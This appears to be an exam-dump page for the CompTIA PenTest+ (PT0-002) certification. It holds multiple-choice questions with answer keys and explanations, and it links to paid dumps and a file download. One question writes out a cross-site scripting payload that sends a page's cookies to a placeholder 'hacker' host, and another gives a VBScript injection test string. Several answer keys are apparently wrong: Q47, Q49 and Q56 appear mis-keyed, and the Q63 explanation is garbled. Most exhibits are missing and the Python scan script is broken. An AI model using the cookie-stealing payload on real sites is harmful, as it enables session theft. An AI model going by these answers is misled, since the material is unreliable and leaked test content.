CompTIA PT0-002 Exam Preparation Guide and PDF Download
Verified & Correct PT0-002 Practice Test Reliable Source Nov 16, 2024 Updated
CompTIA PT0-002 Certification Exam is designed to evaluate the knowledge and skillset of cybersecurity professionals working in the field of Penetration Testing. A successful candidate of the exam earns the CompTIA PenTest+ certification, which is globally recognized as a sign of mastery in PenTesting.
What is the objective of the CompTIA PT0-002 Certification Exam?
The CompTIA PT0-002 Certification Exam is designed to test the knowledge and skills required to plan and scope a penetration analyzing engagement including scanning, understanding legal and compliance requirements, analyzing results and, producing a written report with remediation techniques, of the candidate. You can achieve these goals with the help of the PT0-002 Dumps. Desktop and mobile security, Error handling, brute-forcing, security analyzing, and security policy compliance are the important objectives of this certification exam.
To qualify for the CompTIA PenTest+ exam, a candidate should have at least three to four years of experience in network security or equivalent experience. They should also have a solid understanding of the OSI model and TCP/IP, and a basic understanding of tools and technologies used in penetration testing. CompTIA PenTest+ Certification certification qualifies professionals for job roles like penetration tester, vulnerability assessment and management, security analyst, and ethical hacker. CompTIA PenTest+ Certification certification is a valuable asset to cybersecurity professionals looking to upgrade their skills and validate their expertise in the field of penetration testing.
NEW QUESTION # 46
A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:
Which of the following represents what the penetration tester is attempting to accomplish?
- A. MAC spoofing
- B. ARP poisoning
- C. DNS cache poisoning
- D. Double-tagging attack
Answer: D
Explanation:
https://scapy.readthedocs.io/en/latest/usage.html
NEW QUESTION # 47
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
- A. Side channel
- B. Data flooding
- C. Cybersquatting
- D. Session riding
Answer: D
NEW QUESTION # 48
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
- A. Disable NIC.
- B. List processes.
- C. Spawn a local shell.
- D. Change the MAC address
Answer: C
Explanation:
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.
NEW QUESTION # 49
The results of an Nmap scan are as follows:
Which of the following would be the BEST conclusion about this device?
- A. This device is most likely a gateway with in-band management services.
- B. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
- C. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
- D. This device is most likely a proxy server forwarding requests over TCP/443.
Answer: C
NEW QUESTION # 50
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option C
- B. Option B
- C. Option A
- D. Option D
Answer: C
Explanation:
Reference: https://research.securitum.com/http-2-protocol-it-is-faster-but-is-it-also-safer/
NEW QUESTION # 51
A penetration tester captured the following traffic during a web-application test:
Which of the following methods should the tester use to visualize the authorization information being transmitted?
- A. Decode the authorization header using UTF-8.
- B. Decode the authorization header using Base64.
- C. Decrypt the authorization header using bcrypt.
- D. Decrypt the authorization header using AES.
Answer: B
NEW QUESTION # 52
During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)
- A. SQL injection
- B. Server-side request forgery
- C. Command injection
- D. Log poisoning
- E. Cross-site request forgery
- F. Cross-site scripting
Answer: C,D
Explanation:
Explanation
Local File Inclusion (LFI) is a web vulnerability that allows an attacker to include files on a server through the web browser. This can expose sensitive information or lead to remote code execution.
Some possible next steps that a penetration tester can try after exploiting an LFI vulnerability are:
Log poisoning: This involves injecting malicious code into the web server's log files and then including them via LFI to execute the code34.
PHP wrappers: These are special streams that can be used to manipulate files or data via LFI. For example, php://input can be used to pass arbitrary data to an LFI script, or php://filter can be used to encode or decode files5.
NEW QUESTION # 53
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Which of the following tools will help the tester prepare an attack for this scenario?
- A. Netcat and cURL
- B. Hydra and crunch
- C. Burp Suite and DIRB
- D. Nmap and OWASP ZAP
Answer: A
Explanation:
Netcat and cURL are tools that will help the tester prepare an attack for this scenario, as they can be used to establish a TCP connection, send payloads, and receive responses from the target web server. Netcat is a versatile tool that can create TCP or UDP connections and transfer data between hosts. cURL is a tool that can transfer data using various protocols, such as HTTP, FTP, SMTP, etc. The tester can use these tools to exploit the PHP script that executes shell commands with the value of the "item" variable.
NEW QUESTION # 54
Which of the following is most important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A. Bill of materials including supplies, subcontracts, and costs incurred during assessment
- B. Quantitative impact assessments given a successful software compromise
- C. Code context for instances of unsafe typecasting operations
- D. Executive summary of the penetration-testing methods used
Answer: C
Explanation:
A static application-security test (SAST) is a type of software testing that analyzes the source code, bytecode or binary code of an application for potential vulnerabilities, such as injection flaws, cross-site scripting, buffer overflows and insecure data handling. A SAST report should provide the application developers with detailed information about the location, severity and impact of the identified vulnerabilities, as well as recommendations for remediation. One of the most important elements to include in a SAST report is the code context for each vulnerability, which shows the relevant code snippets where the issue occurs, as well as the data flow and control flow paths that lead to the vulnerability. This helps the developers understand the root cause of the problem and how to fix it. Code context is especially important for instances of unsafe typecasting operations, which are a common source of security weaknesses in applications. Typecasting is the process of converting one data type to another, such as from an integer to a string. Unsafe typecasting occurs when the conversion is done without proper validation or sanitization, which can lead to unexpected behavior, memory corruption, data loss or code execution. For example, in C/C++, casting a pointer to an incompatible type can result in undefined behavior or buffer overflows. Therefore, a SAST report should include the code context for instances of unsafe typecasting operations, so that the developers can review and correct them. References:
*The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 6: Analyzing and Reporting Pen Test Results, page 329-330.
*Static Application Security Testing (SAST) | GitLab1
*What Is Static Application Security Testing (SAST)?2
*APPLICATION SECURITY TESTING REPORT 2020 - Code Intelligence3
*On the combination of static analysis for software security assessment ...4
NEW QUESTION # 55
Given the following code:<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Parameterized queries
- B. Session tokens
- C. Base64 encoding
- D. Web-application firewall
- E. Input validation
- F. Output encoding
Answer: E,F
Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
NEW QUESTION # 56
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?
- A. A device on the network has poisoned the ARP cache.
- B. A device on the network has an IP address in the wrong subnet.
- C. A multicast session was initiated using the wrong multicast group.
- D. An ARP flooding attack is using the broadcast address to perform DDoS.
Answer: C
NEW QUESTION # 57
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.




Answer:
Explanation:
See explanation below
Explanation:
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print("%s:%s - OPEN" % (ip, port))
except socket.timeout
print("%:%s - TIMEOUT" % (ip, port))
except socket.error as e:
print("%:%s - CLOSED" % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)
NEW QUESTION # 58
A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:
IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"
When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?
- A. SQL injection
- B. Cross-site scripting
- C. Cross-site request forgery
- D. Command injection
Answer: B
NEW QUESTION # 59
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?
- A. Impersonation
- B. Badge cloning
- C. Spear phishing
- D. Watering-hole attack
Answer: C
Explanation:
Explanation
Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system.
NEW QUESTION # 60
A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?
- A. Use random MAC addresses on the penetration testing distribution.
- B. Connect to the penetration testing company's VPS using a VPN.
- C. Configure wireless access to use a AAA server.
- D. Install a host-based firewall on the penetration testing distribution.
Answer: B
NEW QUESTION # 61
Which of the following tools provides Python classes for interacting with network protocols?
- A. Empire
- B. PowerSploit
- C. Impacket
- D. Responder
Answer: C
Explanation:
Explanation
Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.
NEW QUESTION # 62
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
- A. MITRE ATT&CK framework
- B. OWASP Top 10
- C. NIST SP 800-53
- D. PTES technical guidelines
Answer: A
Explanation:
Reference: https://digitalguardian.com/blog/what-mitre-attck-framework
NEW QUESTION # 63
The following PowerShell snippet was extracted from a log of an attacker machine:
A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
- A. Line 19
- B. Line 13
- C. Line 8
- D. Line 20
Answer: C
Explanation:
$X=2,4,6,8,9,20,5
$y=[System.Collections.ArrayList]$X
$y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.
NEW QUESTION # 64
The following output is from reconnaissance on a public-facing banking website:
Based on these results, which of the following attacks is MOST likely to succeed?
- A. A birthday attack on 64-bit ciphers (Sweet32)
- B. An attack on a session ticket extension (Ticketbleed)
- C. An attack that breaks RC4 encryption
- D. A Heartbleed attack
Answer: C
NEW QUESTION # 65
......
Pass CompTIA PT0-002 exam Dumps 100 Pass Guarantee With Latest Demo: https://www.itcertmagic.com/CompTIA/real-PT0-002-exam-prep-dumps.html
Free CompTIA PT0-002 Exam Files Downloaded Instantly: https://drive.google.com/open?id=17qeoUIU735sgvuGLiaayFLyhw9f2maY9